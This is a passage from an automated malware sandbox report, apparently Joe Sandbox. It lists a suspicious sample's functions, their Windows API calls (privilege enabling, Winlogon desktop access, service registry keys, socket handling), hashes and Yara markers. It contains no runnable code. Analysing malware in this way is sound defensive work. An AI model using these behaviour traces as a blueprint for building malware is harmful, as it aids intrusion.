                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$Open$CloseCurrentHandleTerminateToken
                        • String ID: SeDebugPrivilege
                        • API String ID: 3822579153-2896544425
                        • Opcode ID: 46e03eeb43237c4219530782c3061b1ca488fb5b3c0c060921b95a0ed9a673e8
                        • Instruction ID: a8318dda45e3085a9c140345e5cc1122ef3a856107f5b2395552c34a9f699ba3
                        • Opcode Fuzzy Hash: 46e03eeb43237c4219530782c3061b1ca488fb5b3c0c060921b95a0ed9a673e8
                        • Instruction Fuzzy Hash: 73F044767003112BE114EB548C86F7F779AEFC4750F000428FB402B242CBB0ACA182B2
                        Function 10012CA0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 25threadwindowCOMMON
                        Download Yara Rule
                        APIs
                        • GetCurrentThreadId.KERNEL32 ref: 10012CA1
                        • GetThreadDesktop.USER32(00000000), ref: 10012CA8
                          • Part of subcall function 10012C50: OpenDesktopA.USER32(?,00000000,00000000,400001CF), ref: 10012C63
                        • PostMessageA.USER32(0000FFFF,00000312,00000000,002E0003), ref: 10012CD4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: DesktopThread$CurrentMessageOpenPost
                        • String ID: Winlogon
                        • API String ID: 1322334875-744610081
                        • Opcode ID: e147b5548efc162c12c2a63e82a41f61971f056e15de3ebd1f44cc4f1de22b03
                        • Instruction ID: 70ef0cdf761ecaa1c5cd624777e035ee06562f4c287f95f11dac0264ad6e66fe
                        • Opcode Fuzzy Hash: e147b5548efc162c12c2a63e82a41f61971f056e15de3ebd1f44cc4f1de22b03
                        • Instruction Fuzzy Hash: 8AE086B2A4176027F61167707C4AFDE22459F05741F064430FB019E182E6A4EEE251D2
                        Function 100115F2 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNEL32(kernel32.dll,WaitForMultipleObjects), ref: 1001161A
                        • GetProcAddress.KERNEL32(00000000), ref: 10011621
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: WaitForMultipleObjects$kernel32.dll
                        • API String ID: 2574300362-425320575
                        • Opcode ID: 6075e51fa116afd9420e75921e96e9c4f61b5407291641b036638b2c256c607b
                        • Instruction ID: abd7cf47b72cea9b357ea9cf502593f308c5542d5c2b7bb7961bb643003d0c13
                        • Opcode Fuzzy Hash: 6075e51fa116afd9420e75921e96e9c4f61b5407291641b036638b2c256c607b
                        • Instruction Fuzzy Hash: F9C04CB14067A8EFFB049F708C8C6883E7AEE8A7127544540F745DB125CBBA5481AA1D
                        Function 10011500 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 8libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNEL32(kernel32.dll,PeekNamedPipe), ref: 1001151A
                        • GetProcAddress.KERNEL32(00000000), ref: 10011521
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: PeekNamedPipe$kernel32.dll
                        • API String ID: 2574300362-3402591003
                        • Opcode ID: 8bd60a103a891dde2712e6e38d4571aaca0dfa570f8c9cafbc2fd2fd6e04d9c3
                        • Instruction ID: a7a377e570a6ccf4006725b132b15871cf8ba0bc900e0d3f4eac70dc391a4334
                        • Opcode Fuzzy Hash: 8bd60a103a891dde2712e6e38d4571aaca0dfa570f8c9cafbc2fd2fd6e04d9c3
                        • Instruction Fuzzy Hash: EEC09BB0401BA0E7FB049B718C4CB453A55D6857113404540F74195111D7795480AF19
                        Function 00401A18 Relevance: 6.5, APIs: 5, Instructions: 246COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4082612578.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4082597077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082631431.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082647752.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082671358.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082688873.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082705565.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ILQ18dgzMU.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c8a95432b831c7267b03fa961f98e7af2a702391516c768b6c9cf0bccdc06ddb
                        • Instruction ID: f96a3d1d10757f0d55ad1781d9d7bfbe656efa2b46a32013cb53c2e8976ff9eb
                        • Opcode Fuzzy Hash: c8a95432b831c7267b03fa961f98e7af2a702391516c768b6c9cf0bccdc06ddb
                        • Instruction Fuzzy Hash: A8712532A045147BEB226B25CD84FAF3A29AB413A4F150237FC15BA2F1E73CDD41969C
                        Function 004029A7 Relevance: 6.4, APIs: 5, Instructions: 102memoryCOMMON
                        Download Yara Rule
                        APIs
                        • HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,0040324A), ref: 004029C8
                        • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,0040324A), ref: 004029EC
                        • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,0040324A), ref: 00402A06
                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,0040324A), ref: 00402AC7
                        • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,0040324A), ref: 00402ADE
                        Memory Dump Source
                        • Source File: 00000000.00000002.4082612578.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4082597077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082631431.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082647752.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082671358.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082688873.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082705565.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ILQ18dgzMU.jbxd
                        Similarity
                        • API ID: AllocVirtual$FreeHeap
                        • String ID:
                        • API String ID: 714016831-0
                        • Opcode ID: e2da3ce05240604d240e5d9c3d1120620b1103eba999aa56c600187876e2bb5c
                        • Instruction ID: 125bce25715dd4f7fddf9a76bc6a9a36cf70974911cbcb035c38124f58abbfa0
                        • Opcode Fuzzy Hash: e2da3ce05240604d240e5d9c3d1120620b1103eba999aa56c600187876e2bb5c
                        • Instruction Fuzzy Hash: F731E170740B019BD731CF28ED89B26BAA4EB44B59F50413BE056AA2D0DBB8A841CB4C
                        Function 100011B0 Relevance: 6.3, APIs: 5, Instructions: 56stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrlen.KERNEL32(74DF0F00,?,00000000,74DF0F00,00000000,10002725,00000000,?), ref: 100011CE
                        • ??2@YAPAXI@Z.MSVCRT(00000001), ref: 100011D8
                        • strchr.MSVCRT ref: 100011FA
                        • strchr.MSVCRT ref: 10001213
                        • atoi.MSVCRT(00000001), ref: 10001220
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: strchr$??2@atoilstrlen
                        • String ID:
                        • API String ID: 3786266066-0
                        • Opcode ID: dae428b9acc3bb0b47e850492135e199fcdf30e39ab31222b8f3c7346d6b0b81
                        • Instruction ID: 1fb9c14f2e3f972c556b5afa14bd55f78d79fd110d4c99c8390d6c97146cdd35
                        • Opcode Fuzzy Hash: dae428b9acc3bb0b47e850492135e199fcdf30e39ab31222b8f3c7346d6b0b81
                        • Instruction Fuzzy Hash: 8E01F5326003645FEB009B699C447ABB7DAEFCA351F040069EA44CB300D7B16905CB62
                        Function 1000ECD0 Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                        Download Yara Rule
                        APIs
                        • ??2@YAPAXI@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,1006A1B8,000000FF), ref: 1000ED36
                          • Part of subcall function 1000E6B0: RegOpenKeyExA.ADVAPI32(?,00000000,00000000,000F003F,10010B75,00000000,10010B75,?,SYSTEM\CurrentControlSet\Services\%s,00000000,80000002,00000000,?,?), ref: 1000E6C8
                        • ??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 1000ED88
                        • ??2@YAPAXI@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,1006A1B8,000000FF), ref: 1000ED98
                        • ??3@YAXPAX@Z.MSVCRT(?), ref: 1000EDF2
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: ??2@??3@$Open
                        • String ID:
                        • API String ID: 2374869923-0
                        • Opcode ID: 9e19db815c60587931948160d3a28b3c914f7ef16ea15ea8ed3e0a803438db8c
                        • Instruction ID: 64974c1327e54e55cf0e1af65d710c0e849b65887b199428c9043e7f6ecf557d
                        • Opcode Fuzzy Hash: 9e19db815c60587931948160d3a28b3c914f7ef16ea15ea8ed3e0a803438db8c
                        • Instruction Fuzzy Hash: 4731EE766046845BD308EE28CC9166BB3D6FBC8740F44493DF95A97381EB36ED09CB92
                        Function 10011970 Relevance: 6.1, APIs: 4, Instructions: 111COMMON
                        Download Yara Rule
                        APIs
                        • LookupAccountSidA.ADVAPI32(00000000,?,00000000,00000000,00000000,00000001,00000000), ref: 10011A1D
                        • LookupAccountSidA.ADVAPI32(00000000,?,00000008,00000000,?,00000001,00000000), ref: 10011A63
                        • wsprintfA.USER32 ref: 10011A91
                        • 746A24A0.WTSAPI32(?), ref: 10011AA7
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: AccountLookup$wsprintf
                        • String ID:
                        • API String ID: 1244087393-0
                        • Opcode ID: 8ed260b9186e04422498aef0bc553d55f17dcaeb644841c3a8f9ac8f5b1bf6c0
                        • Instruction ID: 0fd99e425747e76a7f083c64f372aaac6d8492bea7266781f3ff252f3aeb8c8a
                        • Opcode Fuzzy Hash: 8ed260b9186e04422498aef0bc553d55f17dcaeb644841c3a8f9ac8f5b1bf6c0
                        • Instruction Fuzzy Hash: D6314E71209346AFE714CE54C8D4DABB7E9FFC8244F504E2DF68597240E670EE498B62
                        Function 1000E990 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                        Download Yara Rule
                        APIs
                        • LocalSize.KERNEL32(00000000), ref: 1000E9FE
                        • LocalFree.KERNEL32(00000000,00000000,00000000), ref: 1000EA0A
                        • LocalSize.KERNEL32(00000000), ref: 1000EA25
                        • LocalFree.KERNEL32(00000000,00000000,00000000), ref: 1000EA31
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$FreeSize
                        • String ID:
                        • API String ID: 2726095061-0
                        • Opcode ID: 9b743251187909aee0ad9be3953de43cb8f720caaf3eee6a15f90d1a5f0ef3cb
                        • Instruction ID: 478b3d063ec124332ba6cffa6dcdc5e6aef98eb324571a0519443ce4427bd314
                        • Opcode Fuzzy Hash: 9b743251187909aee0ad9be3953de43cb8f720caaf3eee6a15f90d1a5f0ef3cb
                        • Instruction Fuzzy Hash: C91193352056909BF225EB24CC92BFFB399EF8A390F004929F851632C5DF74AD0587A7
                        Function 00401487 Relevance: 6.1, APIs: 4, Instructions: 51memoryCOMMON
                        Download Yara Rule
                        APIs
                        • FreeLibrary.KERNEL32(?,00000000,E9C11475,?,0040110E,00000000,00407050,00025B6E,000007E9,00000000,0040166A,?), ref: 004014C3
                        • VirtualFree.KERNEL32(?,00000000,00008000,E9C11475,?,0040110E,00000000,00407050,00025B6E,000007E9,00000000,0040166A,?), ref: 004014E7
                        • GetProcessHeap.KERNEL32(00000000,?,E9C11475,?,0040110E,00000000,00407050,00025B6E,000007E9,00000000,0040166A,?), ref: 004014EF
                        • HeapFree.KERNEL32(00000000), ref: 004014F6
                        Memory Dump Source
                        • Source File: 00000000.00000002.4082612578.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4082597077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082631431.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082647752.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082671358.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082688873.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082705565.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ILQ18dgzMU.jbxd
                        Similarity
                        • API ID: Free$Heap$LibraryProcessVirtual
                        • String ID:
                        • API String ID: 548792435-0
                        • Opcode ID: 7062f5a0ac8085ff3908f49efe8d1e95656ad2264a7c42e5a2d975c876b4dca1
                        • Instruction ID: 1a79a4596b48e4e30b7297cdf9259662fa10b5e590b9a6e86bf00a82a7cc2a21
                        • Opcode Fuzzy Hash: 7062f5a0ac8085ff3908f49efe8d1e95656ad2264a7c42e5a2d975c876b4dca1
                        • Instruction Fuzzy Hash: 6C01DB76500611AFC7209FA9DDC4D27B7EDAB44325715893EF2AAA36B0C738A8418B54
                        Function 10003A90 Relevance: 6.0, APIs: 4, Instructions: 47synchronizationnetworkCOMMON
                        Download Yara Rule
                        APIs
                        • WaitForSingleObject.KERNEL32(?,000000FF,00000000,74DF2EE0,?,00000000,10069E7C,000000FF,100028C0), ref: 10003ACC
                        • CloseHandle.KERNEL32(?), ref: 10003AEF
                        • CloseHandle.KERNEL32(?), ref: 10003AF8
                        • WSACleanup.WS2_32 ref: 10003AFA
                          • Part of subcall function 10003FC0: setsockopt.WS2_32(?,0000FFFF,00000080,00000000), ref: 10003FEA
                          • Part of subcall function 10003FC0: CancelIo.KERNEL32(?), ref: 10003FF7
                          • Part of subcall function 10003FC0: InterlockedExchange.KERNEL32(?,00000000), ref: 10004006
                          • Part of subcall function 10003FC0: closesocket.WS2_32(?), ref: 10004013
                          • Part of subcall function 10003FC0: SetEvent.KERNEL32(?), ref: 10004020
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseHandle$CancelCleanupEventExchangeInterlockedObjectSingleWaitclosesocketsetsockopt
                        • String ID:
                        • API String ID: 136543108-0
                        • Opcode ID: 634793217506f191db49a08dabb9ee3f7c7a2b72bc87fda37cb6dcc7b8f1c163
                        • Instruction ID: 5bfc93a864bc07e7b47afb1c99583d44f41eea366a3187d476b79e86f3b5488c
                        • Opcode Fuzzy Hash: 634793217506f191db49a08dabb9ee3f7c7a2b72bc87fda37cb6dcc7b8f1c163
                        • Instruction Fuzzy Hash: 9E112B35114B919FE315DF28C944B5BB7E9EB85720F508A0DE0A6426D1CBB8A909CBA2
                        Function 10011630 Relevance: 6.0, APIs: 4, Instructions: 34sleepthreadCOMMON
                        Download Yara Rule
                        APIs
                        • Sleep.KERNEL32(00000001), ref: 1001164F
                        • TerminateThread.KERNEL32(?,00000000), ref: 10011668
                        • Sleep.KERNEL32(00000001), ref: 10011670
                        • TerminateProcess.KERNEL32(?,00000001), ref: 10011678
                          • Part of subcall function 10003FC0: setsockopt.WS2_32(?,0000FFFF,00000080,00000000), ref: 10003FEA
                          • Part of subcall function 10003FC0: CancelIo.KERNEL32(?), ref: 10003FF7
                          • Part of subcall function 10003FC0: InterlockedExchange.KERNEL32(?,00000000), ref: 10004006
                          • Part of subcall function 10003FC0: closesocket.WS2_32(?), ref: 10004013
                          • Part of subcall function 10003FC0: SetEvent.KERNEL32(?), ref: 10004020
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: SleepTerminate$CancelEventExchangeInterlockedProcessThreadclosesocketsetsockopt
                        • String ID:
                        • API String ID: 3242870944-0
                        • Opcode ID: 2196a195735274d6bf8c3d4dc2ef0f2112ce8a3263a4541f5427cbdab3e13d9a
                        • Instruction ID: 27f78afd7f630ef31bf47fb096b80eefde634334e31a038b81b66bd7d71fe0eb
                        • Opcode Fuzzy Hash: 2196a195735274d6bf8c3d4dc2ef0f2112ce8a3263a4541f5427cbdab3e13d9a
                        • Instruction Fuzzy Hash: 22F04932240350AFE310EB65CC85F57B7E5BB89720F004A1DF6999B2D0D6B1F840CB51
                        Function 100069C0 Relevance: 6.0, APIs: 4, Instructions: 16threadwindowCOMMON
                        Download Yara Rule
                        APIs
                        • GetInputState.USER32 ref: 100069C3
                        • GetCurrentThreadId.KERNEL32 ref: 100069CF
                        • PostThreadMessageA.USER32(00000000), ref: 100069D6
                        • GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 100069E7
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: MessageThread$CurrentInputPostState
                        • String ID:
                        • API String ID: 2517755969-0
                        • Opcode ID: f068882617931f03d063f58f9d32d767fe4a38755a4332fb425594b53d04b317
                        • Instruction ID: be37903158f8ce1355c4e343a4486a1e9724d5febc653840301b138d8f38b73e
                        • Opcode Fuzzy Hash: f068882617931f03d063f58f9d32d767fe4a38755a4332fb425594b53d04b317
                        • Instruction Fuzzy Hash: 60D0C77168036077FB107BE48C4FF463A297B04B01F900454F705DA1E1D6F456148B67
                        Function 00404691 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135COMMON
                        Download Yara Rule
                        APIs
                        • GetCPInfo.KERNEL32(00000000,?,?,00000000,00000000,?,?,00401DAF), ref: 004046D9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4082612578.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4082597077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082631431.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082647752.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082671358.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082688873.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082705565.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ILQ18dgzMU.jbxd
                        Similarity
                        • API ID: Info
                        • String ID: HB$XB
                        • API String ID: 1807457897-3584453872
                        • Opcode ID: 4c37e6a83d63de9d2fb2b44ecfe72da2f89996fac8cd49a487bff374a2131383
                        • Instruction ID: d4833c5b677eb040447b0e5d1f2c88bdbccd8c5be6ae427099e583a284eb64d3
                        • Opcode Fuzzy Hash: 4c37e6a83d63de9d2fb2b44ecfe72da2f89996fac8cd49a487bff374a2131383
                        • Instruction Fuzzy Hash: 9E417EB96441909EE720EF74E8403667BB19B86304FA4887BD744F72E1C73E494A879D
                        Function 004048D0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON
                        Download Yara Rule
                        APIs
                        • GetCPInfo.KERNEL32(?,00000000), ref: 004048E4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4082612578.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4082597077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082631431.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082647752.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
